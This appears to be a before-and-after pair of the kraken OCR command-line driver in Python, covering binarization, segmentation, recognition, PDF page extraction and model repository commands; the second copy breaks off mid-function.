logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
if ctx.meta['output_mode'] != 'native':
from kraken import serialization
fp.write(serialization.serialize(preds, ctx.meta['base_image'],
Image.open(ctx.meta['base_image']).size,
ctx.meta['text_direction'],
scripts,
bounds['regions'] if 'regions' in bounds else None,
ctx.meta['output_mode']))
else:
fp.write('\n'.join(s.prediction for s in preds))
message('\u2713', fg='green')
@click.group(chain=True)
@click.version_option()
@click.option('-i', '--input',
type=(click.Path(exists=True), # type: ignore
click.Path(writable=True)),
multiple=True,
help='Input-output file pairs. Each input file (first argument) is mapped to one '
'output file (second argument), e.g. `-i input.png output.txt`')
@click.option('-I', '--batch-input', multiple=True, help='Glob expression to add multiple files at once.')
@click.option('-o', '--suffix', default='', show_default=True,
help='Suffix for output files from batch and PDF inputs.')
@click.option('-v', '--verbose', default=0, count=True, show_default=True)
@click.option('-f', '--format-type', type=click.Choice(['image', 'alto', 'page', 'pdf', 'xml']), default='image',
help='Sets the default input type. In image mode inputs are image '
'files, alto/page expects XML files in the respective format, pdf '
'expects PDF files with numbered suffixes added to output file '
'names as needed.')
@click.option('-p', '--pdf-format', default='{src}_{idx:06d}',
show_default=True,
help='Format for output of PDF files. valid fields '
'are `src` (source file), `idx` (page number), and `uuid` (v4 uuid). '
'`-o` suffixes are appended to this format string.')
@click.option('-h', '--hocr', 'serializer',
help='Switch between hOCR, ALTO, abbyyXML, PageXML or "native" '
'output. Native are plain image files for image, JSON for '
'segmentation, and text for transcription output.',
flag_value='hocr')
@click.option('-a', '--alto', 'serializer', flag_value='alto')
@click.option('-y', '--abbyy', 'serializer', flag_value='abbyyxml')
@click.option('-x', '--pagexml', 'serializer', flag_value='pagexml')
@click.option('-n', '--native', 'serializer', flag_value='native', default=True,
show_default=True)
@click.option('-d', '--device', default='cpu', show_default=True,
help='Select device to use (cpu, cuda:0, cuda:1, ...)')
@click.option('-r', '--raise-on-error/--no-raise-on-error', default=False, show_default=True,
help='Raises the exception that caused processing to fail in the case of an error')
def cli(input, batch_input, suffix, verbose, format_type, pdf_format, serializer, device, raise_on_error):
"""
Base command for recognition functionality.
Inputs are defined as one or more pairs `-i input_file output_file`
followed by one or more chainable processing commands. Likewise, verbosity
is set on all subcommands with the `-v` switch.
"""
ctx = click.get_current_context()
ctx.meta['device'] = device
ctx.meta['input_format_type'] = format_type if format_type != 'pdf' else 'image'
ctx.meta['raise_failed'] = raise_on_error
ctx.meta['output_mode'] = serializer
log.set_logger(logger, level=30 - min(10 * verbose, 20))
@cli.resultcallback()
def process_pipeline(subcommands, input, batch_input, suffix, verbose, format_type, pdf_format, **args):
"""
Helper function calling the partials returned by each subcommand and
placing their respective outputs in temporary files.
"""
import glob
import uuid
import tempfile
input = list(input)
# expand batch inputs
if batch_input and suffix:
for batch_expr in batch_input:
for in_file in glob.glob(batch_expr, recursive=True):
input.append((in_file, '{}{}'.format(os.path.splitext(in_file)[0], suffix)))
# parse pdfs
if format_type == 'pdf':
import pyvips
if not batch_input:
logger.warning('PDF inputs not added with batch option. Manual output filename will be ignored and `-o` utilized.')
new_input = []
num_pages = 0
for (fpath, _) in input:
doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
if 'n-pages' in doc.get_fields():
num_pages += doc.get('n-pages')
with log.progressbar(length=num_pages, label='Extracting PDF pages') as bar:
for (fpath, _) in input:
try:
doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
if 'n-pages' not in doc.get_fields():
logger.warning('{fpath} does not contain pages. Skipping.')
continue
n_pages = doc.get('n-pages')
dest_dict = {'idx': -1, 'src': fpath, 'uuid': None}
for i in range(0, n_pages):
dest_dict['idx'] += 1
dest_dict['uuid'] = str(uuid.uuid4())
fd, filename = tempfile.mkstemp(suffix='.png')
os.close(fd)
doc = pyvips.Image.new_from_file(fpath, dpi=300, page=i, access="sequential")
logger.info(f'Saving temporary image {fpath}:{dest_dict['idx']} to {filename}')
doc.write_to_file(filename)
new_input.append((filename, pdf_format.format(**dest_dict) + suffix))
bar.update(1)
except pyvips.error.Error:
logger.warning(f'{fpath} is not a PDF file. Skipping.')
input = new_input
ctx = click.get_current_context()
for io_pair in input:
ctx.meta['first_process'] = True
ctx.meta['last_process'] = False
ctx.meta['orig_file'] = io_pair[0]
if 'base_image' in ctx.meta:
del ctx.meta['base_image']
try:
tmps = [tempfile.mkstemp() for _ in subcommands[1:]]
for tmp in tmps:
os.close(tmp[0])
fc = [io_pair[0]] + [tmp[1] for tmp in tmps] + [io_pair[1]]
for idx, (task, input, output) in enumerate(zip(subcommands, fc, fc[1:])):
if len(fc) - 2 == idx:
ctx.meta['last_process'] = True
task(input=input, output=output)
except Exception as e:
logger.error(f'Failed processing {io_pair[0]}: {str(e)}')
if ctx.meta['raise_failed'] is True:
raise
finally:
for f in fc[1:-1]:
os.unlink(f)
# clean up temporary PDF image files
if format_type == 'pdf':
logger.debug(f'unlinking {fc[0]}')
os.unlink(fc[0])
@cli.command('binarize')
@click.option('--threshold', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--zoom', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--escale', show_default=True, default=1.0, type=click.FLOAT)
@click.option('--border', show_default=True, default=0.1, type=click.FLOAT)
@click.option('--perc', show_default=True, default=80, type=click.IntRange(1, 100))
@click.option('--range', show_default=True, default=20, type=click.INT)
@click.option('--low', show_default=True, default=5, type=click.IntRange(1, 100))
@click.option('--high', show_default=True, default=90, type=click.IntRange(1, 100))
def binarize(threshold, zoom, escale, border, perc, range, low, high):
"""
Binarizes page images.
"""
return partial(binarizer, threshold, zoom, escale, border, perc, range, low, high)
@cli.command('segment')
@click.pass_context
@click.option('-i', '--model',
default=None,
show_default=True, type=click.Path(exists=True),
help='Baseline detection model to use')
@click.option('-x/-bl', '--boxes/--baseline', default=True, show_default=True,
help='Switch between legacy box segmenter and neural baseline segmenter')
@click.option('-d', '--text-direction', default='horizontal-lr',
show_default=True,
type=click.Choice(['horizontal-lr', 'horizontal-rl',
'vertical-lr', 'vertical-rl']),
help='Sets principal text direction')
@click.option('--scale', show_default=True, default=None, type=click.FLOAT)
@click.option('-m', '--maxcolseps', show_default=True, default=2, type=click.INT)
@click.option('-b/-w', '--black-colseps/--white_colseps', show_default=True, default=False)
@click.option('-r/-l', '--remove_hlines/--hlines', show_default=True, default=True)
@click.option('-p', '--pad', show_default=True, type=(int, int), default=(0, 0),
help='Left and right padding around lines')
@click.option('-m', '--mask', show_default=True, default=None,
type=click.File(mode='rb', lazy=True), help='Segmentation mask '
'suppressing page areas for line detection. 0-valued image '
'regions are ignored for segmentation purposes. Disables column '
'detection.')
def segment(ctx, model, boxes, text_direction, scale, maxcolseps,
black_colseps, remove_hlines, pad, mask):
"""
Segments page images into text lines.
"""
if model and boxes:
logger.warning(f'Baseline model ({model}) given but legacy segmenter selected. Forcing to -bl.')
boxes = False
if boxes is False:
if not model:
model = SEGMENTATION_DEFAULT_MODEL
from kraken.lib.vgsl import TorchVGSLModel
message(f'Loading ANN {model}\t', nl=False)
try:
model = TorchVGSLModel.load_model(model)
model.to(ctx.meta['device'])
except Exception:
message('\u2717', fg='red')
ctx.exit(1)
message('\u2713', fg='green')
return partial(segmenter, boxes, model, text_direction, scale, maxcolseps,
black_colseps, remove_hlines, pad, mask,
ctx.meta['device'])
def _validate_mm(ctx, param, value):
"""
Maps model mappings to a dictionary.
"""
model_dict = {'ignore': []} # type: Dict[str, Union[str, List[str]]]
if len(value) == 1 and len(value[0].split(':')) == 1:
model_dict['default'] = value[0]
return model_dict
try:
for m in value:
k, v = m.split(':')
if v == 'ignore':
model_dict['ignore'].append(k) # type: ignore
else:
model_dict[k] = os.path.expanduser(v)
except Exception:
raise click.BadParameter('Mappings must be in format script:model')
return model_dict
@cli.command('ocr')
@click.pass_context
@click.option('-m', '--model', default=DEFAULT_MODEL, multiple=True,
show_default=True, callback=_validate_mm,
help='Path to an recognition model or mapping of the form '
'$script1:$model1. Add multiple mappings to run multi-model '
'recognition based on detected scripts. Use the default keyword '
'for adding a catch-all model. Recognition on scripts can be '
'ignored with the model value ignore.')
@click.option('-p', '--pad', show_default=True, type=click.INT, default=16, help='Left and right '
'padding around lines')
@click.option('-n', '--reorder/--no-reorder', show_default=True, default=True,
help='Reorder code points to logical order')
@click.option('--base-dir', show_default=True, default='auto',
type=click.Choice(['L', 'R', 'auto']), help='Set base text '
'direction. This should be set to the direction used during the '
'creation of the training data. If set to `auto` it will be '
'overridden by any explicit value given in the input files.')
@click.option('-s', '--no-segmentation', default=False, show_default=True, is_flag=True,
help='Enables non-segmentation mode treating each input image as a whole line.')
@click.option('-d', '--text-direction', default='horizontal-tb',
show_default=True,
type=click.Choice(['horizontal-tb', 'vertical-lr', 'vertical-rl']),
help='Sets principal text direction in serialization output')
@click.option('--threads', default=1, show_default=True, type=click.IntRange(1),
help='Number of threads to use for OpenMP parallelization.')
def ocr(ctx, model, pad, reorder, base_dir, no_segmentation, text_direction, threads):
"""
Recognizes text in line images.
"""
from kraken.lib import models
if ctx.meta['input_format_type'] != 'image' and no_segmentation:
raise click.BadParameter('no_segmentation mode is incompatible with page/alto inputs')
if reorder and base_dir != 'auto':
reorder = base_dir
# first we try to find the model in the absolue path, then ~/.kraken, then
# LEGACY_MODEL_DIR
nm = {} # type: Dict[str, models.TorchSeqRecognizer]
ign_scripts = model.pop('ignore')
for k, v in model.items():
search = [v,
os.path.join(click.get_app_dir(APP_NAME), v),
os.path.join(LEGACY_MODEL_DIR, v)]
location = None
for loc in search:
if os.path.isfile(loc):
location = loc
break
if not location:
raise click.BadParameter(f'No model for {k} found')
message(f'Loading ANN {k}\t', nl=False)
try:
rnn = models.load_any(location, device=ctx.meta['device'])
nm[k] = rnn
except Exception:
message('\u2717', fg='red')
ctx.exit(1)
message('\u2713', fg='green')
if 'default' in nm:
from collections import defaultdict
nn = defaultdict(lambda: nm['default']) # type: Dict[str, models.TorchSeqRecognizer]
nn.update(nm)
nm = nn
# thread count is global so setting it once is sufficient
nm[k].nn.set_num_threads(threads)
# set output mode
ctx.meta['text_direction'] = text_direction
return partial(recognizer,
model=nm,
pad=pad,
no_segmentation=no_segmentation,
bidi_reordering=reorder,
script_ignore=ign_scripts)
@cli.command('show')
@click.pass_context
@click.argument('model_id')
def show(ctx, model_id):
"""
Retrieves model metadata from the repository.
"""
from kraken import repo
from kraken.lib.util import make_printable, is_printable
desc = repo.get_description(model_id)
chars = []
combining = []
for char in sorted(desc['graphemes']):
if not is_printable(char):
combining.append(make_printable(char))
else:
chars.append(char)
message(
'name: {}\n\n{}\n\n{}\nscripts: {}\nalphabet: {} {}\naccuracy: {:.2f}%\nlicense: {}\nauthor(s): {}\ndate: {}'.format(
model_id, desc['summary'], desc['description'], ' '.join(
desc['script']), ''.join(chars), ', '.join(combining), desc['accuracy'], desc['license']['id'], '; '.join(
x['name'] for x in desc['creators']), desc['publication_date']))
ctx.exit(0)
@cli.command('list')
@click.pass_context
def list_models(ctx):
"""
Lists models in the repository.
"""
from kraken import repo
message('Retrieving model list ', nl=False)
model_list = repo.get_listing(partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h\n', nl=False)
for id, metadata in model_list.items():
message('{} ({}) - {}'.format(id, ', '.join(metadata['type']), metadata['summary']))
ctx.exit(0)
@cli.command('get')
@click.pass_context
@click.argument('model_id')
def get(ctx, model_id):
"""
Retrieves a model from the repository.
"""
from kraken import repo
try:
os.makedirs(click.get_app_dir(APP_NAME))
except OSError:
pass
message('Retrieving model ', nl=False)
filename = repo.get_model(model_id, click.get_app_dir(APP_NAME),
partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h')
message(f'Model name: {filename}')
ctx.exit(0)
if __name__ == '__main__':
cli()
| # -*- coding: utf-8 -*-
#
# Copyright 2015 Benjamin Kiessling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
kraken.kraken
~~~~~~~~~~~~~
Command line drivers for recognition functionality.
"""
import os
import warnings
import logging
import pkg_resources
from typing import Dict, Union, List, cast, Any, IO, Callable
from functools import partial
from PIL import Image
import click
from kraken.lib import log
warnings.simplefilter('ignore', UserWarning)
logging.captureWarnings(True)
logger = logging.getLogger('kraken')
APP_NAME = 'kraken'
SEGMENTATION_DEFAULT_MODEL = pkg_resources.resource_filename(__name__, 'blla.mlmodel')
DEFAULT_MODEL = ['en-default.mlmodel']
LEGACY_MODEL_DIR = '/usr/local/share/ocropus'
# raise default max image size to 20k * 20k pixels
Image.MAX_IMAGE_PIXELS = 20000 ** 2
def message(msg: str, **styles) -> None:
if logger.getEffectiveLevel() >= 30:
click.secho(msg, **styles)
def get_input_parser(type_str: str) -> Callable[[str], Dict[str, Any]]:
if type_str == 'alto':
from kraken.lib.xml import parse_alto
return parse_alto
elif type_str == 'page':
from kraken.lib.xml import parse_page
return parse_page
elif type_str == 'xml':
from kraken.lib.xml import parse_xml
return parse_xml
elif type_str == 'image':
return Image.open
# chainable functions of functional components (binarization/segmentation/recognition)
def binarizer(threshold, zoom, escale, border, perc, range, low, high, input, output) -> None:
from kraken import binarization
ctx = click.get_current_context()
if ctx.meta['first_process']:
if ctx.meta['input_format_type'] != 'image':
input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
ctx.meta['first_process'] = False
else:
raise click.UsageError('Binarization has to be the initial process.')
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
message('Binarizing\t', nl=False)
try:
res = binarization.nlbin(im, threshold, zoom, escale, border, perc, range,
low, high)
if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
with click.open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
res.save(f'{output}.png')
from kraken import serialization
fp.write(serialization.serialize([],
image_name=f'{output}.png',
image_size=res.size,
template=ctx.meta['output_mode']))
else:
form = None
ext = os.path.splitext(output)[1]
if ext in ['.jpg', '.jpeg', '.JPG', '.JPEG', '']:
form = 'png'
if ext:
logger.warning('jpeg does not support 1bpp images. Forcing to png.')
res.save(output, format=form)
ctx.meta['base_image'] = output
except Exception:
message('\u2717', fg='red')
raise
message('\u2713', fg='green')
def segmenter(legacy, model, text_direction, scale, maxcolseps, black_colseps,
remove_hlines, pad, mask, device, input, output) -> None:
import json
from kraken import pageseg
from kraken import blla
ctx = click.get_current_context()
if ctx.meta['first_process']:
if ctx.meta['input_format_type'] != 'image':
input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
ctx.meta['first_process'] = False
if 'base_image' not in ctx.meta:
ctx.meta['base_image'] = input
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
if mask:
try:
mask = Image.open(mask)
except IOError as e:
raise click.BadParameter(str(e))
message('Segmenting\t', nl=False)
try:
if legacy:
res = pageseg.segment(im,
text_direction,
scale,
maxcolseps,
black_colseps,
no_hlines=remove_hlines,
pad=pad,
mask=mask)
else:
res = blla.segment(im, text_direction, mask=mask, model=model, device=device)
except Exception:
message('\u2717', fg='red')
raise
if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
with click.open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
from kraken import serialization
from kraken.rpred import ocr_record
if 'type' in res and res['type'] == 'baselines':
records = [ocr_record('', '', '', bl) for bl in res['lines']]
else:
records = []
for line in res['boxes']:
xmin, xmax = min(line[::2]), max(line[::2])
ymin, ymax = min(line[1::2]), max(line[1::2])
records.append(ocr_record('', [], [], [[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]]))
fp.write(serialization.serialize(records,
image_name=ctx.meta['base_image'],
image_size=im.size,
regions=res['regions'] if 'regions' in res else None,
template=ctx.meta['output_mode']))
else:
with click.open_file(output, 'w') as fp:
fp = cast(IO[Any], fp)
json.dump(res, fp)
message('\u2713', fg='green')
def recognizer(model, pad, no_segmentation, bidi_reordering, script_ignore, input, output) -> None:
import json
from kraken import rpred
ctx = click.get_current_context()
bounds = None
if 'base_image' not in ctx.meta:
ctx.meta['base_image'] = input
if ctx.meta['first_process']:
if ctx.meta['input_format_type'] != 'image':
doc = get_input_parser(ctx.meta['input_format_type'])(input)
ctx.meta['base_image'] = doc['image']
doc['text_direction'] = 'horizontal-lr'
if doc['base_dir'] and bidi_reordering is True:
message(f'Setting base text direction for BiDi reordering to {doc["base_dir"]} (from XML input file)')
bidi_reordering = doc['base_dir']
bounds = doc
try:
im = Image.open(ctx.meta['base_image'])
except IOError as e:
raise click.BadParameter(str(e))
if not bounds and ctx.meta['base_image'] != input:
with click.open_file(input, 'r') as fp:
try:
fp = cast(IO[Any], fp)
bounds = json.load(fp)
except ValueError as e:
raise click.UsageError(f'{input} invalid segmentation: {str(e)}')
elif not bounds:
if no_segmentation:
bounds = {'script_detection': False,
'text_direction': 'horizontal-lr',
'boxes': [(0, 0) + im.size]}
else:
raise click.UsageError('No line segmentation given. Add one with the input or run `segment` first.')
elif no_segmentation:
logger.warning('no_segmentation mode enabled but segmentation defined. Ignoring --no-segmentation option.')
scripts = set()
# script detection
if 'script_detection' in bounds and bounds['script_detection']:
it = rpred.mm_rpred(model, im, bounds, pad,
bidi_reordering=bidi_reordering,
script_ignore=script_ignore)
else:
it = rpred.rpred(model['default'], im, bounds, pad,
bidi_reordering=bidi_reordering)
preds = []
with log.progressbar(it, label='Processing') as bar:
for pred in bar:
preds.append(pred)
ctx = click.get_current_context()
with click.open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
message(f'Writing recognition results for {ctx.meta["orig_file"]}\t', nl=False)
logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
if ctx.meta['output_mode'] != 'native':
from kraken import serialization
fp.write(serialization.serialize(preds, ctx.meta['base_image'],
Image.open(ctx.meta['base_image']).size,
ctx.meta['text_direction'],
scripts,
bounds['regions'] if 'regions' in bounds else None,
ctx.meta['output_mode']))
else:
fp.write('\n'.join(s.prediction for s in preds))
message('\u2713', fg='green')
@click.group(chain=True)
@click.version_option()
@click.option('-i', '--input',
type=(click.Path(exists=True), # type: ignore
click.Path(writable=True)),
multiple=True,
help='Input-output file pairs. Each input file (first argument) is mapped to one '
'output file (second argument), e.g. `-i input.png output.txt`')
@click.option('-I', '--batch-input', multiple=True, help='Glob expression to add multiple files at once.')
@click.option('-o', '--suffix', default='', show_default=True,
help='Suffix for output files from batch and PDF inputs.')
@click.option('-v', '--verbose', default=0, count=True, show_default=True)
@click.option('-f', '--format-type', type=click.Choice(['image', 'alto', 'page', 'pdf', 'xml']), default='image',
help='Sets the default input type. In image mode inputs are image '
'files, alto/page expects XML files in the respective format, pdf '
'expects PDF files with numbered suffixes added to output file '
'names as needed.')
@click.option('-p', '--pdf-format', default='{src}_{idx:06d}',
show_default=True,
help='Format for output of PDF files. valid fields '
'are `src` (source file), `idx` (page number), and `uuid` (v4 uuid). '
'`-o` suffixes are appended to this format string.')
@click.option('-h', '--hocr', 'serializer',
help='Switch between hOCR, ALTO, abbyyXML, PageXML or "native" '
'output. Native are plain image files for image, JSON for '
'segmentation, and text for transcription output.',
flag_value='hocr')
@click.option('-a', '--alto', 'serializer', flag_value='alto')
@click.option('-y', '--abbyy', 'serializer', flag_value='abbyyxml')
@click.option('-x', '--pagexml', 'serializer', flag_value='pagexml')
@click.option('-n', '--native', 'serializer', flag_value='native', default=True,
show_default=True)
@click.option('-d', '--device', default='cpu', show_default=True,
help='Select device to use (cpu, cuda:0, cuda:1, ...)')
@click.option('-r', '--raise-on-error/--no-raise-on-error', default=False, show_default=True,
help='Raises the exception that caused processing to fail in the case of an error')
def cli(input, batch_input, suffix, verbose, format_type, pdf_format, serializer, device, raise_on_error):
"""
Base command for recognition functionality.
Inputs are defined as one or more pairs `-i input_file output_file`
followed by one or more chainable processing commands. Likewise, verbosity
is set on all subcommands with the `-v` switch.
"""
ctx = click.get_current_context()
ctx.meta['device'] = device
ctx.meta['input_format_type'] = format_type if format_type != 'pdf' else 'image'
ctx.meta['raise_failed'] = raise_on_error
ctx.meta['output_mode'] = serializer
log.set_logger(logger, level=30 - min(10 * verbose, 20))
@cli.resultcallback()
def process_pipeline(subcommands, input, batch_input, suffix, verbose, format_type, pdf_format, **args):
"""
Helper function calling the partials returned by each subcommand and
placing their respective outputs in temporary files.
"""
import glob
import uuid
import tempfile
input = list(input)
# expand batch inputs
if batch_input and suffix:
for batch_expr in batch_input:
for in_file in glob.glob(batch_expr, recursive=True):
input.append((in_file, '{}{}'.format(os.path.splitext(in_file)[0], suffix)))
# parse pdfs
if format_type == 'pdf':
import pyvips
if not batch_input:
logger.warning('PDF inputs not added with batch option. Manual output filename will be ignored and `-o` utilized.')
new_input = []
num_pages = 0
for (fpath, _) in input:
doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
if 'n-pages' in doc.get_fields():
num_pages += doc.get('n-pages')
with log.progressbar(length=num_pages, label='Extracting PDF pages') as bar:
for (fpath, _) in input:
try:
doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
if 'n-pages' not in doc.get_fields():
logger.warning('{fpath} does not contain pages. Skipping.')
continue
n_pages = doc.get('n-pages')
dest_dict = {'idx': -1, 'src': fpath, 'uuid': None}
for i in range(0, n_pages):
dest_dict['idx'] += 1
dest_dict['uuid'] = str(uuid.uuid4())
fd, filename = tempfile.mkstemp(suffix='.png')
os.close(fd)
doc = pyvips.Image.new_from_file(fpath, dpi=300, page=i, access="sequential")
logger.info(f'Saving temporary image {fpath}:{dest_dict["idx"]} to {filename}')
doc.write_to_file(filename)
new_input.append((filename, pdf_format.format(**dest_dict) + suffix))
bar.update(1)
except pyvips.error.Error:
logger.warning(f'{fpath} is not a PDF file. Skipping.')
input = new_input
ctx = click.get_current_context()
for io_pair in input:
ctx.meta['first_process'] = True
ctx.meta['last_process'] = False
ctx.meta['orig_file'] = io_pair[0]
if 'base_image' in ctx.meta:
del ctx.meta['base_image']
try:
tmps = [tempfile.mkstemp() for _ in subcommands[1:]]
for tmp in tmps:
os.close(tmp[0])
fc = [io_pair[0]] + [tmp[1] for tmp in tmps] + [io_pair[1]]
for idx, (task, input, output) in enumerate(zip(subcommands, fc, fc[1:])):
if len(fc) - 2 == idx:
ctx.meta['last_process'] = True
task(input=input, output=output)
except Exception as e:
logger.error(f'Failed processing {io_pair[0]}: {str(e)}')
if ctx.meta['raise_failed'] is True:
raise
finally:
for f in fc[1:-1]:
os.unlink(f)
# clean up temporary PDF image files
if format_type == 'pdf':
logger.debug(f'unlinking {fc[0]}')
os.unlink(fc[0])
@cli.command('binarize')
@click.option('--threshold', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--zoom', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--escale', show_default=True, default=1.0, type=click.FLOAT)
@click.option('--border', show_default=True, default=0.1, type=click.FLOAT)
@click.option('--perc', show_default=True, default=80, type=click.IntRange(1, 100))
@click.option('--range', show_default=True, default=20, type=click.INT)
@click.option('--low', show_default=True, default=5, type=click.IntRange(1, 100))
@click.option('--high', show_default=True, default=90, type=click.IntRange(1, 100))
def binarize(threshold, zoom, escale, border, perc, range, low, high):
"""
Binarizes page images.
"""
return partial(binarizer, threshold, zoom, escale, border, perc, range, low, high)
@cli.command('segment')
@click.pass_context
@click.option('-i', '--model',
default=None,
show_default=True, type=click.Path(exists=True),
help='Baseline detection model to use')
@click.option('-x/-bl', '--boxes/--baseline', default=True, show_default=True,
help='Switch between legacy box segmenter and neural baseline segmenter')
@click.option('-d', '--text-direction', default='horizontal-lr',
show_default=True,
type=click.Choice(['horizontal-lr', 'horizontal-rl',
'vertical-lr', 'vertical-rl']),
help='Sets principal text direction')
@click.option('--scale', show_default=True, default=None, type=click.FLOAT)
@click.option('-m', '--maxcolseps', show_default=True, default=2, type=click.INT)
@click.option('-b/-w', '--black-colseps/--white_colseps', show_default=True, default=False)
@click.option('-r/-l', '--remove_hlines/--hlines', show_default=True, default=True)
@click.option('-p', '--pad', show_default=True, type=(int, int), default=(0, 0),
help='Left and right padding around lines')
@click.option('-m', '--mask', show_default=True, default=None,
type=click.File(mode='rb', lazy=True), help='Segmentation mask '
'suppressing page areas for line detection. 0-valued image '
'regions are ignored for segmentation purposes. Disables column '
'detection.')
def segment(ctx, model, boxes, text_direction, scale, maxcolseps,
black_colseps, remove_hlines, pad, mask):
"""
Segments page images into text lines.
"""
if model and boxes:
logger.warning(f'Baseline model ({model}) given but legacy segmenter selected. Forcing to -bl.')
boxes = False
if boxes is False:
if not model:
model = SEGMENTATION_DEFAULT_MODEL
from kraken.lib.vgsl import TorchVGSLModel
message(f'Loading ANN {model}\t', nl=False)
try:
model = TorchVGSLModel.load_model(model)
model.to(ctx.meta['device'])
except Exception:
message('\u2717', fg='red')
ctx.exit(1)
message('\u2713', fg='green')
return partial(segmenter, boxes, model, text_direction, scale, maxcolseps,
black_colseps, remove_hlines, pad, mask,
ctx.meta['device'])
def _validate_mm(ctx, param, value):
"""
Maps model mappings to a dictionary.
"""
model_dict = {'ignore': []} # type: Dict[str, Union[str, List[str]]]
if len(value) == 1 and len(value[0].split(':')) == 1:
model_dict['default'] = value[0]
return model_dict
try:
for m in value:
k, v = m.split(':')
if v == 'ignore':
model_dict['ignore'].append(k) # type: ignore
else:
model_dict[k] = os.path.expanduser(v)
except Exception:
raise click.BadParameter('Mappings must be in format script:model')
return model_dict
@cli.command('ocr')
@click.pass_context
@click.option('-m', '--model', default=DEFAULT_MODEL, multiple=True,
show_default=True, callback=_validate_mm,
help='Path to an recognition model or mapping of the form '
'$script1:$model1. Add multiple mappings to run multi-model '
'recognition based on detected scripts. Use the default keyword '
'for adding a catch-all model. Recognition on scripts can be '
'ignored with the model value ignore.')
@click.option('-p', '--pad', show_default=True, type=click.INT, default=16, help='Left and right '
'padding around lines')
@click.option('-n', '--reorder/--no-reorder', show_default=True, default=True,
help='Reorder code points to logical order')
@click.option('--base-dir', show_default=True, default='auto',
type=click.Choice(['L', 'R', 'auto']), help='Set base text '
'direction. This should be set to the direction used during the '
'creation of the training data. If set to `auto` it will be '
'overridden by any explicit value given in the input files.')
@click.option('-s', '--no-segmentation', default=False, show_default=True, is_flag=True,
help='Enables non-segmentation mode treating each input image as a whole line.')
@click.option('-d', '--text-direction', default='horizontal-tb',
show_default=True,
type=click.Choice(['horizontal-tb', 'vertical-lr', 'vertical-rl']),
help='Sets principal text direction in serialization output')
@click.option('--threads', default=1, show_default=True, type=click.IntRange(1),
help='Number of threads to use for OpenMP parallelization.')
def ocr(ctx, model, pad, reorder, base_dir, no_segmentation, text_direction, threads):
"""
Recognizes text in line images.
"""
from kraken.lib import models
if ctx.meta['input_format_type'] != 'image' and no_segmentation:
raise click.BadParameter('no_segmentation mode is incompatible with page/alto inputs')
if reorder and base_dir != 'auto':
reorder = base_dir
# first we try to find the model in the absolue path, then ~/.kraken, then
# LEGACY_MODEL_DIR
nm = {} # type: Dict[str, models.TorchSeqRecognizer]
ign_scripts = model.pop('ignore')
for k, v in model.items():
search = [v,
os.path.join(click.get_app_dir(APP_NAME), v),
os.path.join(LEGACY_MODEL_DIR, v)]
location = None
for loc in search:
if os.path.isfile(loc):
location = loc
break
if not location:
raise click.BadParameter(f'No model for {k} found')
message(f'Loading ANN {k}\t', nl=False)
try:
rnn = models.load_any(location, device=ctx.meta['device'])
nm[k] = rnn
except Exception:
message('\u2717', fg='red')
ctx.exit(1)
message('\u2713', fg='green')
if 'default' in nm:
from collections import defaultdict
nn = defaultdict(lambda: nm['default']) # type: Dict[str, models.TorchSeqRecognizer]
nn.update(nm)
nm = nn
# thread count is global so setting it once is sufficient
nm[k].nn.set_num_threads(threads)
# set output mode
ctx.meta['text_direction'] = text_direction
return partial(recognizer,
model=nm,
pad=pad,
no_segmentation=no_segmentation,
bidi_reordering=reorder,
script_ignore=ign_scripts)
@cli.command('show')
@click.pass_context
@click.argument('model_id')
def show(ctx, model_id):
"""
Retrieves model metadata from the repository.
"""
from kraken import repo
from kraken.lib.util import make_printable, is_printable
desc = repo.get_description(model_id)
chars = []
combining = []
for char in sorted(desc['graphemes']):
if not is_printable(char):
combining.append(make_printable(char))
else:
chars.append(char)
message(
'name: {}\n\n{}\n\n{}\nscripts: {}\nalphabet: {} {}\naccuracy: {:.2f}%\nlicense: {}\nauthor(s): {}\ndate: {}'.format(
model_id, desc['summary'], desc['description'], ' '.join(
desc['script']), ''.join(chars), ', '.join(combining), desc['accuracy'], desc['license']['id'], '; '.join(
x['name'] for x in desc['creators']), desc['publication_date']))
ctx.exit(0)
@cli.command('list')
@click.pass_context
def list_models(ctx):
"""
Lists models in the repository.
"""
from kraken import repo
message('Retrieving model list ', nl=False)
model_list = repo.get_listing(partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h\n', nl=False)
for id, metadata in model_list.items():
message('{} ({}) - {}'.format(id, ', '.join(metadata['type']), metadata['summary']))
ctx.exit(0)
@cli.command('get')
@click.pass_context
@click.argument('model_id')
def get(ctx, model_id):
"""
Retrieves a model from the repository.
"""
from kraken import repo
try:
os.makedirs(click.get_app_dir(APP_NAME))
except OSError:
pass
message('Retrieving model ', nl=False)
filename = repo.get_model(model_id, click.get_app_dir(APP_NAME),
